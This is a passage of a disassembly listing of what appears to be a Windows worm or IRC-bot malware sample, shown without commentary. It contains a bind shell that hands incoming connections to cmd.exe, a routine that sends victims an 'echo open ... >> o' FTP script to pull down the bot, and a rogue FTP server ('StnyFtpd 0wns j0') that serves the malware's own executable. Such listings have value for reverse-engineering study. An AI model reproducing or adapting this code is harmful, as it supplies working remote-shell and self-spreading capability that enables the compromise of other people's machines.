lea eax, [ebp+var_404]
push [ebp+var_4]
push eax
push dword_4E5E64
call dword_4E3148 ; send
jmp short loc_40EF32
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EF74 proc near ; DATA XREF: sub_401CC7+2CFE�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
Dst = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
mov esi, eax
pop ecx
lea edi, [ebp+var_11C]
rep movsd
push 1
xor edi, edi
pop esi
mov [eax+98h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_98]
call dword_4E30F8 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call dword_4E3178 ; socket
mov [ebp+arg_0], eax
lea eax, [ebp+Dst]
push 10h
push eax
push [ebp+arg_0]
call dword_4E3124 ; bind
push 5
push [ebp+arg_0]
call dword_4E3120 ; listen
mov ebx, ds:dword_4F53D0
mov esi, ds:dword_4F533C
loc_40EFF4: ; CODE XREF: sub_40EF74+1CB�j
push edi
push edi
push [ebp+arg_0]
call dword_4E318C ; accept
mov dword_4E5E64, eax
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4E5E60
push offset dword_4E5E5C
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4E5E58
push offset dword_4E5E54
call ebx ; CreatePipe
push 44h ; Size
lea eax, [ebp+var_7C]
push edi ; Val
push eax ; Dst
call _memset
mov eax, dword_4E5E5C
add esp, 0Ch
mov [ebp+var_44], eax
mov eax, dword_4E5E58
mov [ebp+var_40], eax
push edi
push 1
lea eax, [ebp+var_3C]
push 2
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call ds:dword_4F53CC ; GetCurrentProcess
push eax
push dword_4E5E58
call ds:dword_4F53CC ; GetCurrentProcess
push eax
call ds:dword_4F53C8 ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
lea eax, [ebp+var_C]
push 1
push eax
lea eax, [ebp+var_C]
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_4F5340 ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EF29
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_4F5350 ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EEE6
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_4F5350 ; CreateThread
push 0FFFFFFFFh
mov [ebp+var_10], eax
push [ebp+var_28]
call ds:dword_4F5374 ; WaitForSingleObject
push edi
push [ebp+var_10]
call ds:dword_4F5380 ; TerminateThread
push edi
push [ebp+var_14]
call ds:dword_4F5380 ; TerminateThread
push [ebp+var_10]
call esi ; CloseHandle
push [ebp+var_14]
call esi ; CloseHandle
push edi
push [ebp+var_28]
call ds:dword_4F53C4 ; TerminateProcess
push dword_4E5E5C
call esi ; CloseHandle
push dword_4E5E60
call esi ; CloseHandle
push dword_4E5E54
call esi ; CloseHandle
push dword_4E5E58
call esi ; CloseHandle
push [ebp+var_24]
call esi ; CloseHandle
push [ebp+var_28]
call esi ; CloseHandle
jmp loc_40EFF4
sub_40EF74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40F144 proc near ; DATA XREF: .data:0043F010�o
jmp $+5
sub_40F144 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F149 proc near
push 0FFFEh
push 400h
call sub_419551
pop ecx
mov dword_4E5E6C, eax
pop ecx
retn
sub_40F149 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F160 proc near ; DATA XREF: sub_40C12D+34D�o
Dest = byte ptr -6C0h
var_2C0 = dword ptr -2C0h
var_C0 = byte ptr -0C0h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6C0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_B0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [eax+98h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_A4]
call dword_4E30F8 ; htons
push ebx
push esi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], ebx
call dword_4E3178 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_40F207
cmp [ebp+var_1C], ebx
jnz short loc_40F1E7
push ebx ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D34
add esp, 14h
loc_40F1E7: ; CODE XREF: sub_40F160+65�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C3F
push [ebp+var_AC]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_40F207: ; CODE XREF: sub_40F160+60�j
mov eax, [ebp+var_AC]
push 10h
imul eax, 234h
mov dword_456024[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E3124 ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_40F302
call dword_4E308C ; WSAGetLastError
cmp eax, 2740h
jz short loc_40F287
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F267
push esi ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D34
add esp, 14h
loc_40F267: ; CODE XREF: sub_40F160+E5�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C3F
push [ebp+var_AC]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_40F287: ; CODE XREF: sub_40F160+DE�j
push 0FFFEh
push ebx
call sub_419551
pop ecx
mov dword_4E5E6C, eax
pop ecx
mov [ebp+var_12], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4E3124 ; bind
cmp eax, esi
jnz short loc_40F302
call dword_4E308C ; WSAGetLastError
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F2E2
cmp eax, 2740h
jz short loc_40F2E2
push esi ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D34
add esp, 14h
loc_40F2E2: ; CODE XREF: sub_40F160+159�j
; sub_40F160+160�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C3F
push [ebp+var_AC]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_40F302: ; CODE XREF: sub_40F160+CD�j
; sub_40F160+14C�j
push 5
push edi
call dword_4E3120 ; listen
cmp eax, esi
jz loc_40F3E7
mov [ebp+var_4], 10h
mov esi, offset Str ; "nlzhxmpyrjsyle.exe"
loc_40F31F: ; CODE XREF: sub_40F160+1D7�j
; sub_40F160+227�j ...
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C0]
push eax
push edi
call dword_4E318C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40F31F
cmp [ebp+var_1C], 0
jnz short loc_40F360
push 0 ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D34
add esp, 14h
loc_40F360: ; CODE XREF: sub_40F160+1DD�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C3F
pop ecx
lea eax, [ebp+var_2C0]
push 0
push 200h
push eax
push [ebp+arg_0]
call dword_4E3110 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F31F
push esi
push esi
push dword_4E2E18
push [ebp+var_B0]
call sub_40AF71
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+Dest]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jz loc_40F31F
inc dword_4E5E74
jmp loc_40F31F
; ---------------------------------------------------------------------------
loc_40F3E7: ; CODE XREF: sub_40F160+1AD�j
push edi
call dword_4E3190 ; closesocket
push [ebp+var_AC]
call sub_40BA72
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_40F160 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F402 proc near ; DATA XREF: sub_40C12D+22A�o
var_A70 = byte ptr -0A70h
var_8E0 = dword ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
Dst = byte ptr -2A0h
var_23C = byte ptr -23Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
Str = byte ptr -128h
Dest = byte ptr -0FCh
var_C8 = byte ptr -0C8h
Str1 = byte ptr -0B0h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A70h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6E0]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A70]
xor esi, esi
push eax
push 101h
mov [ebp+var_1C], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_24], ebx
mov [ebp+var_22C], esi
mov [ebp+var_43C], esi
call ds:dword_4F550C ; WSAStartup
push esi
push ebx
push 2
call ds:dword_4F553C ; socket
mov esi, ds:dword_4F5510
lea ecx, [ebp+var_1C]
push 4
push ecx
mov edi, 0FFFFh
push 4
push edi
push eax
mov [ebp+var_8], eax
call esi ; setsockopt
lea eax, [ebp+var_2C]
push 4
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+var_24]
push eax
push 8004667Eh
push edi
call ds:dword_4F5514 ; ioctlsocket
mov ax, word ptr dword_4E2E18
and [ebp+var_48], 0
push eax
mov [ebp+var_4C], 2
call dword_4E30F8 ; htons
mov [ebp+var_4A], ax
lea eax, [ebp+var_4C]
push 10h
push eax
push edi
call ds:dword_4F5518 ; bind
test eax, eax
jge short loc_40F4C8
mov eax, ebx
jmp loc_40FA32
; ---------------------------------------------------------------------------
loc_40F4C8: ; CODE XREF: sub_40F402+BD�j
push 0Ah
push edi
call ds:dword_4F551C ; listen
mov [ebp+var_22C], ebx
mov ebx, ds:dword_4F5540
mov [ebp+var_228], edi
mov [ebp+var_4], edi
loc_40F4E6: ; CODE XREF: sub_40F402+11D�j
; sub_40F402+628�j
push 41h
lea esi, [ebp+var_22C]
pop ecx
lea edi, [ebp+var_43C]
rep movsd
xor esi, esi
lea eax, [ebp+var_43C]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_4F5544 ; select
cmp eax, 0FFFFFFFFh
jz loc_40FA2F
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_40F4E6
loc_40F521: ; CODE XREF: sub_40F402+622�j
xor esi, esi
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 64h ; Size
lea eax, [ebp+Str1]
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+var_43C]
push eax
push edi
call sub_43ABA2 ; __WSAFDIsSet
test eax, eax
jz loc_40FA1D
cmp edi, [ebp+var_8]
jnz short loc_40F5D8
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_23C]
push eax
push [ebp+var_8]
call ds:dword_4F5520 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FA1D
xor ecx, ecx
cmp [ebp+var_22C], esi
jbe short loc_40F5A2
lea edx, [ebp+var_228]
loc_40F592: ; CODE XREF: sub_40F402+19E�j
cmp [edx], eax
jz short loc_40F5A2
inc ecx
add edx, 4
cmp ecx, [ebp+var_22C]
jb short loc_40F592
loc_40F5A2: ; CODE XREF: sub_40F402+188�j
; sub_40F402+192�j
cmp ecx, [ebp+var_22C]
jnz short loc_40F5C0
cmp [ebp+var_22C], 40h
jnb short loc_40F5C0
mov [ebp+ecx*4+var_228], eax
inc [ebp+var_22C]
loc_40F5C0: ; CODE XREF: sub_40F402+1A6�j
; sub_40F402+1AF�j
cmp eax, [ebp+var_4]
jle short loc_40F5C8
mov [ebp+var_4], eax
loc_40F5C8: ; CODE XREF: sub_40F402+1C1�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40FA1D
; ---------------------------------------------------------------------------
loc_40F5D8: ; CODE XREF: sub_40F402+15A�j
push esi
lea eax, [ebp+Dst]
push 64h
push eax
push edi
call ds:dword_4F5534 ; recv
test eax, eax
jg short loc_40F63F
mov edx, [ebp+var_22C]
xor ecx, ecx
cmp edx, esi
jbe short loc_40F633
lea eax, [ebp+var_228]
loc_40F5FF: ; CODE XREF: sub_40F402+207�j
cmp [eax], edi
jz short loc_40F60D
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40F5FF
jmp short loc_40F633
; ---------------------------------------------------------------------------
loc_40F60D: ; CODE XREF: sub_40F402+1FF�j
dec edx
cmp ecx, edx
jnb short loc_40F62D
lea eax, [ebp+ecx*4+var_228]
loc_40F619: ; CODE XREF: sub_40F402+229�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_22C]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_40F619
loc_40F62D: ; CODE XREF: sub_40F402+20E�j
dec [ebp+var_22C]
loc_40F633: ; CODE XREF: sub_40F402+1F5�j
; sub_40F402+209�j
push edi
call ds:dword_4F5538 ; closesocket
jmp loc_40FA1D
; ---------------------------------------------------------------------------
loc_40F63F: ; CODE XREF: sub_40F402+1E9�j
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+Dst]
push offset aSS_3 ; "%s %s"
push eax ; Src
call _sscanf
lea eax, [ebp+Str1]
push offset aUser_1 ; "USER"
push eax ; Str1
call _strcmp
add esp, 18h
test eax, eax
jnz short loc_40F683
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F683: ; CODE XREF: sub_40F402+272�j
lea eax, [ebp+Str1]
push offset aPass ; "PASS"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6A7
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F6A7: ; CODE XREF: sub_40F402+296�j
lea eax, [ebp+Str1]
push offset aSyst ; "SYST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6CB
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F6CB: ; CODE XREF: sub_40F402+2BA�j
lea eax, [ebp+Str1]
push offset aRest ; "REST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6EF
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F6EF: ; CODE XREF: sub_40F402+2DE�j
lea eax, [ebp+Str1]
push offset off_44A5C0 ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F713
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F713: ; CODE XREF: sub_40F402+302�j
lea eax, [ebp+Str1]
push offset aType ; "TYPE"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F74E
lea eax, [ebp+var_338]
push offset aA_0 ; "A"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F74E
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F74E: ; CODE XREF: sub_40F402+326�j
; sub_40F402+33D�j
lea eax, [ebp+Str1]
push offset aType_0 ; "TYPE"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F789
lea eax, [ebp+var_338]
push offset aI ; "I"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F789
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40FA08
; ---------------------------------------------------------------------------
loc_40F789: ; CODE XREF: sub_40F402+361�j
; sub_40F402+378�j
lea eax, [ebp+Str1]
push offset aPasv ; "PASV"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F7D7
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+Str]
rep movsd
push eax
lea eax, [ebp+Str]
push eax ; Str
movsw
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
loc_40F7C7: ; CODE XREF: sub_40F402+414�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_40F7CF: ; CODE XREF: sub_40F402+4E7�j
mov edi, [ebp+arg_0]
jmp loc_40FA0B
; ---------------------------------------------------------------------------
loc_40F7D7: ; CODE XREF: sub_40F402+39C�j
lea eax, [ebp+Str1]
push offset aList_0 ; "LIST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F818
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+var_C8]
push eax ; Str
movsb
call _strlen
pop ecx
push eax
lea eax, [ebp+var_C8]
jmp short loc_40F7C7
; ---------------------------------------------------------------------------
loc_40F818: ; CODE XREF: sub_40F402+3EA�j
lea eax, [ebp+Str1]
push offset aPort ; "PORT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40F8EE
lea eax, [ebp+var_2D4]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+Dst]
push offset aS_24 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax ; Src
call _sscanf
lea eax, [ebp+Dest]
push eax ; Str
call _atoi
mov edi, eax
lea eax, [ebp+var_2D4]
push eax ; Str
call _atoi
mov [ebp+var_C], eax
push 32h ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
add esp, 34h
lea eax, [ebp+Dest]
push [ebp+var_C]
push edi
push offset aXX ; "%x%x\n"
push eax ; Dest
call _sprintf
push 10h ; Radix
lea eax, [ebp+Dest]
push esi ; EndPtr
push eax ; Str
call _strtoul
add esp, 1Ch
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_3C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax ; Dest
call _sprintf
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_40F7CF
; ---------------------------------------------------------------------------
loc_40F8EE: ; CODE XREF: sub_40F402+42B�j
lea eax, [ebp+Str1]
push offset aRetr ; "RETR"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40F9E9
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
call sub_40FA39
pop ecx
cmp eax, 1
pop ecx
jnz loc_40F9DF
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferSta ; "ftp transfer started to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F96E
push esi ; int
lea eax, [ebp+var_8E0]
push [ebp+var_448] ; int
push eax ; int
lea eax, [ebp+var_4C8]
push eax ; Str
push [ebp+var_6E0] ; int
call sub_409D34
add esp, 14h
loc_40F96E: ; CODE XREF: sub_40F402+547�j
call sub_40FAB6
cmp eax, 1
jnz loc_40FA0B
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferCom ; "ftp transfer complete to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F9CA
push esi ; int
lea eax, [ebp+var_8E0]
push [ebp+var_448] ; int
push eax ; int
lea eax, [ebp+var_4C8]
push eax ; Str
push [ebp+var_6E0] ; int
call sub_409D34
add esp, 14h
loc_40F9CA: ; CODE XREF: sub_40F402+5A3�j
lea eax, [ebp+var_8E0]
push eax
call sub_415C3F
inc dword_4E5C18
pop ecx
jmp short loc_40FA0B
; ---------------------------------------------------------------------------
loc_40F9DF: ; CODE XREF: sub_40F402+523�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40FA08
; ---------------------------------------------------------------------------
loc_40F9E9: ; CODE XREF: sub_40F402+501�j
lea eax, [ebp+Str1]
push offset aQuit_1 ; "QUIT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40FA0B
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40FA08: ; CODE XREF: sub_40F402+27C�j
; sub_40F402+2A0�j ...
push edi
call ebx ; send
loc_40FA0B: ; CODE XREF: sub_40F402+3D0�j
; sub_40F402+574�j ...
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_40FA1D: ; CODE XREF: sub_40F402+151�j
; sub_40F402+17A�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40F521
jmp loc_40F4E6
; ---------------------------------------------------------------------------
loc_40FA2F: ; CODE XREF: sub_40F402+10F�j
push 1
pop eax
loc_40FA32: ; CODE XREF: sub_40F402+C1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40F402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA39 proc near ; CODE XREF: sub_40F402+519�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4F550C ; WSAStartup
push 0
push 1
push 2
call ds:dword_4F553C ; socket
push [ebp+arg_0]
mov dword_4E5E78, eax
mov [ebp+var_10], 2
call ds:dword_4F5528 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4F552C ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_4E5E78
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40FAB1
push dword_4E5E78
call ds:dword_4F5538 ; closesocket
call ds:dword_4F5508 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40FAB1: ; CODE XREF: sub_40FA39+60�j
push 1
pop eax
leave
retn
sub_40FA39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAB6 proc near ; CODE XREF: sub_40F402:loc_40F96E�p
DstBuf = byte ptr -504h
Filename = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+Filename]
push 104h
push eax
push 0
call ds:dword_4F5344 ; GetModuleFileNameA
lea eax, [ebp+Filename]
push offset aRb ; "rb"
push eax ; Filename
call _fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40FB4D
test byte ptr [esi+0Ch], 10h
jnz short loc_40FB31
push edi
mov edi, 400h
loc_40FAF9: ; CODE XREF: sub_40FAB6+78�j
push esi ; File
push 1 ; Count
lea eax, [ebp+DstBuf]
push edi ; ElementSize
push eax ; DstBuf
call sub_41E3E0
add esp, 10h
lea eax, [ebp+DstBuf]
push 0
push edi
push eax
push dword_4E5E78
call ds:dword_4F5540 ; send
push 1
call ds:dword_4F534C ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40FAF9
pop edi
loc_40FB31: ; CODE XREF: sub_40FAB6+3B�j
push esi ; File
call _fclose
pop ecx
push dword_4E5E78
call ds:dword_4F5538 ; closesocket
call ds:dword_4F5508 ; WSACleanup
push 1
pop eax
loc_40FB4D: ; CODE XREF: sub_40FAB6+35�j
pop esi
leave
retn
sub_40FAB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB50 proc near ; DATA XREF: sub_401CC7+2274�o
; sub_40C12D+475�o
Str = byte ptr -28F0h
Str1 = byte ptr -18F0h
Dest = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_14], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_25C]
call dword_4E30F8 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4E3178 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_40FF41
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_456024[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E3124 ; bind
cmp eax, 0FFFFFFFFh
jz loc_40FF41
push 7FFFFFFFh
push edi
call dword_4E3120 ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FF41
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_4E3194 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40FF41
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40FC27: ; CODE XREF: sub_40FB50+3E7�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_4E30E0 ; select
cmp eax, 0FFFFFFFFh
jz loc_40FF3C
xor esi, esi
mov [ebp+var_4], esi
loc_40FC5D: ; CODE XREF: sub_40FB50+3E1�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_4E2FE4 ; __WSAFDIsSet
test eax, eax
jz loc_40FF27
